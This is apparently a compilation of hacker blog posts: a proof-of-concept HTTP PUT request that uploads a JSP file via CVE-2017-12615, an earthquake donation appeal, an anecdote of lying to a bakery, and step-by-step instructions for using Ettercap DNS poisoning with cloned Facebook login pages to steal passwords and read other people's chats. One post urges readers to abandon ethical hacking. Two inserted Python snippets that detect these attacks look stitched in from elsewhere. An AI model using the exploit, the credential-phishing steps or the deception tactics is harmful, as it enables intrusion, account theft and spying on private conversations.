PoC CVE-2017-12615

Hum… I don’t know, a script using a lot of ranges on Dreamhosts, Bluehosts, OVH, Rackspace… ouuu yep! life is sad.

PUT /tumamamemima.jsp/
Host: www.quierounhot-cacke.com:80
Connection: close
Content-Length: 85

<% out.write("[+] JSP upload successfully."); %>
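A defender's view of the request above, as an added example that is not part of the original post: it scans access-log lines for PUT requests whose path is a JSP name followed by a trailing slash and reports whether the server stored the file (status 201 or 204). The Common Log Format layout and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format, e.g. Tomcat's AccessLogValve with the "common" pattern
# (assumed layout; adjust the regex if your pattern differs).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')
# A .jsp/.jspx name followed by a trailing "/", the shape of the request above.
SUSPICIOUS = re.compile(r'\.jspx?/+$', re.IGNORECASE)


def find_jsp_puts(lines):
    """Return (client, path, status, stored) for PUTs aimed at *.jsp/ paths."""
    hits = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # not an access-log line in the expected layout
        client, method, target, status = m.groups()
        # Drop the query string and decode %xx so "%2F" cannot hide the slash.
        path = unquote(target.split("?", 1)[0])
        if method.upper() == "PUT" and SUSPICIOUS.search(path):
            # 201 = resource created, 204 = existing resource overwritten
            hits.append((client, path, int(status), status in ("201", "204")))
    return hits


# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Sep/2017:10:15:32 +0000] "PUT /tumamamemima.jsp/ HTTP/1.1" 201 -',
    '203.0.113.7 - - [20/Sep/2017:10:15:33 +0000] "GET /tumamamemima.jsp HTTP/1.1" 200 28',
    '198.51.100.9 - - [20/Sep/2017:10:16:01 +0000] "PUT /probe.JSP%2F HTTP/1.1" 403 -',
    '192.0.2.44 - - [20/Sep/2017:10:17:12 +0000] "PUT /api/items/7 HTTP/1.1" 204 -',
]

if __name__ == "__main__":
    for client, path, status, stored in find_jsp_puts(SAMPLE_LOG):
        verdict = "STORED" if stored else "not stored"
        print(f"{client} PUT {path} -> {status} ({verdict})")
```

A 201 or 204 on such a request means the server accepted the write, which Tomcat's default servlet only does when its `readonly` init-param has been set to false.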


Please, help us!

Yesterday Mexico City suffered a terrible earthquake; there are a lot of people trapped in the buildings, explosions, and there are a lot of zones without energy, water, and other services.

There are some accounts where you can help. I donated to “Los topos”, a team created in 1985. You can support where you prefer, but help.

Los Topos Mexicanos
Santander 92000709294
CLABE 014180920007092942
Paypal: donativos@brigada-rescate-topos.org

I will donate all my earnings derived from the bug bounties this month. We need your support; please, if you’re a bug bounty hunter, donate a part of your bounties to help my city. All the bad persons, like us, have at least one thing in our hearts that motivates us to offer everything in the world. Mexico City is one of mine.

The bread attack

One of the most valuable skills in the hacking world is social engineering… in simple words it is the ability to deceive people, or as I say “chamaquear”, well, here is the story.

(The dialogues were originally in Spanish)

I have a friend who loves the bread of the dead; this is a bread of the dead:

This bread is baked in October and November for the Day of the Dead, one of the most important dates in Mexico. But some places start to sell the bread in September.

We live in Mexicali, but I’m from Mexico City, and in my city bakeries are more traditional, and there are bakeries which make the best breads of the dead. But, because these breads are so special, the bakeries just sell them from October 29th to November 3rd… so, in September, how can I get some breads?… hum..

Well.. here is the story:

- Hello
- Yes, Rosetta, good afternoon
- Hi, I'm calling because I want to ask whether you already have bread of the dead. I've heard yours is very good because it's made with rosemary
- Yes, our kitchen has been awarded as one of the 15 best in the world; however, I'm sorry to tell you that we only sell bread of the dead from October 29th until stock runs out
- Hum.. I see... is there any way you could make a special order for me?
- I don't really think so, unless it were a very large volume
- Hum.. I see.. look, let me introduce myself, my name is Judas Gerardo, and basically I'm traveling in the city because I have a restaurant in Mexicali, and well, we don't have very traditional food, so my focus is on bringing the most traditional food of the country to the north so that it becomes known. And for the Day of the Dead I plan to bring bread of the dead from the most traditional bakeries, because it is so lacking over there that people even dare to eat supermarket bread
- Oh God
- Exactly, so I'm starting this new project, and well, I found that Rosetta sells the bread of the dead rated in 2016, and I would like to take some samples to my partners in Mexicali so they can try it and, if they like it, place a much larger order.
- Have you looked at other options?
- I have to be honest, yes; I'm evaluating several bakeries from the 10 best rated, so far I have two, Sucreicacoa and la Pilarika; choosing the one we like most doesn't depend only on me, but well, in the end my intention is to bring the best flavors of the country to the north.
- It's a very ambitious project, and tell me, how many samples do you need?
- I think about 10. Obviously I would pay for them, and if you ask me to, I can pay a higher price. Obviously I can tell you in advance that if you were the ones chosen, we would place an order of at least 10,000 units.
- Excellent, look, I like your idea, let me put you through to the finance department so we can reach an agreement

Well, this is the first part… I agreed with the bakery on 10 special breads for $4,000 MX (around $200 dlls), which is so expensive, but the person told me that the high price was because… actually I don’t know, but.. hum.. well… see the next part.

- Hello, I've come to pick up an order of 10 breads that I placed
- Good morning Judas, I'm Elena, the chef and owner of the restaurant, they told me about your project to bring our bread to Mexicali
- Yes
- You have a slight, very sing-song accent, but underneath you sound normal
- Yes, I'm a chilango; but well, I partnered with some friends in this madness and well... the truth is that I don't go beyond making scrambled eggs, but I take care of the business relationships
- Come Judas, sit with me, we have the breads, but I want you to try one fresh out of the oven so you can see its flavor and texture; and I'll treat you to a delicious coffee that they bring us from Chiapas
- Ouuu... hum.. ok

Well, I spent 3 hours talking about Mexicali, about food, about hacking (yeap.. I told her I’m a security guy).. and after that I got my 10 breads for free… so, my friend will taste the best breads from Mexico City, prepared specially for her by one of the most recognized chefs in the world. I hope she really likes the breads because it was so complicated to get them.. but well, I’m an expert social engineer 😉

Ouuu.. well, of the 10 breads, just 2 survived... for her; coff.. coff..

Yes I know.. this is not a technical post, but good social engineering skills are sometimes more important than technical skills.

Chan, chan, charraaaa…

The magic of the DNS spoofing

After reading the post about intercepting Facebook chats, I talked with a friend about other, more “interesting” things that you can do with this simple attack.

Some months ago in Mexico, attacks on the press, supposedly by the government, were revealed, using SMS to infect cellphones.. well, I think an SMS is not necessary, just perform a DNS attack on a captive portal in a Starbucks, a hotel, a company.. and redirect the user to the malware with a simple button…

Doubts?… 🙂

Well… you can also apply DNS spoofing to *.videosXXXparahackearte.com just to create karma 😛

Reading chats

Well.. sometimes.. you need to know what others are writing about you. Why?.. hum.. well, it’s a good question, and I have a great answer.. ok, no.. but yesterday I needed… so….

The easiest way is to perform DNS poisoning using Ettercap. Open the ettercap.dns, and modify the different domains you want to catch using the attack, for example.. facebook.com, *.facebook.com, *.gmail.com, gmail.com, web.whatsapp.com, etc…

So, after that you have two options: sniff the traffic using Wireshark.. but you need to know that you will need to attack the SSL certificates in order to read the chats, or… open SET, and select the web vectors, clone the targets and point them to your computer, for example, clone https://www.facebook.com.

Now, using Ettercap, select the targets you want to attack, select “DNS poison” in the plug-ins, and start sniffing. When the user requests a website that you included in the .dns file, he/she will be redirected to your computer and pwned!… you can catch the passwords, the chats, the requests, and it will be “transparent” because the DNS is actually answering the victim with your IP.

Don’t judge me…

The new hackers… “ethical” hackers

[…] it focuses on how to become an ethical hacker. Mastering the art of hacking can be an extremely powerful skill that we hope will be used for good. The most successful hackers know how to navigate the thin line between right and wrong while hacking. Many people can break things, and even try to make a quick buck doing so. But imagine you can make the Internet safer, work with amazing companies around the world, and even get paid along the way. Your talent has the potential of keeping billions of people and their data secure. That is what we hope you aspire to.[…] – Pete Yaworski


Where did the real hackers go?… ethical hackers?… fuck Pete… have you sniffed the network at your school?, changed your notes?, stolen passwords?… good people always lose… hackers need to be unethical… fuck off with the world. If you can do something, do it.. weak people suffer, and it is ok.

I hate “ethical” hackers.

How to lose your Facebook account in some steps

Some months ago I lost my Facebook account, it was hacked by… yep.. by Karen. But how could the incredible, invincible, fabulous vendetta be hacked?…

Well it was easy… actually very easy…

I was happy seeing a lot of extreme porn on the Internet when Karen asked me for help, so I connected to a VPN, yeap.. my fault, we were in the same IP range.

She used Ettercap to perform DNS spoofing on www.facebook.com, pointing to her computer, and on her computer she configured a fake landing page using The Social Engineering Toolkit. I usually need to be connected to different VPNs to work, so it’s normal for me to be disconnected from my accounts. I went to Facebook’s messenger, entered my credentials and… pwned!


And that’s all… you don’t fall me very well, as we say!
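How the spoofing described in “Reading chats” and in this post looks from the network defender's side, as an added example that is not from the original posts: it audits observed DNS answers and flags public names that resolve to local-network addresses, and unrelated domains that all resolve to one address. The answer list is constructed, `base_domain` is a naive two-label heuristic, and the audited names are assumed to be public Internet names.

```python
import ipaddress
from collections import defaultdict

# Ranges that should never appear in an answer for a public Internet name.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "127.0.0.0/8")]


def base_domain(qname):
    """Naive registrable domain: the last two labels (assumption, no PSL)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def audit_answers(answers, min_domains=2):
    """answers: iterable of (qname, ip) pairs. Returns a sorted findings list."""
    findings = set()
    by_ip = defaultdict(set)
    for qname, ip in answers:
        addr = ipaddress.ip_address(ip)
        by_ip[ip].add(base_domain(qname))
        # A public site answered with a LAN address: the resolver was spoofed
        # or the answer was forged on the local segment.
        if any(addr in net for net in LOCAL_NETS):
            findings.add(("local-address", qname.lower(), ip))
    for ip, domains in by_ip.items():
        # Several unrelated sites behind one address is the pattern produced
        # by a single machine impersonating all of them.
        if len(domains) >= min_domains:
            findings.add(("shared-address", ",".join(sorted(domains)), ip))
    return sorted(findings)


# Constructed observations (e.g. from resolver logs), not real traffic.
SAMPLE_ANSWERS = [
    ("www.facebook.com", "192.168.1.66"),
    ("web.whatsapp.com", "192.168.1.66"),
    ("mail.gmail.com", "192.168.1.66"),
    ("www.example.org", "203.0.113.10"),
    ("intranet.example.org", "203.0.113.10"),
]

if __name__ == "__main__":
    for kind, subject, ip in audit_answers(SAMPLE_ANSWERS):
        print(f"{kind:15} {subject} -> {ip}")
```

Shared hosting and CDNs also put many domains behind one address, so raise `min_domains` or treat the shared-address finding as a lead to confirm against a trusted resolver.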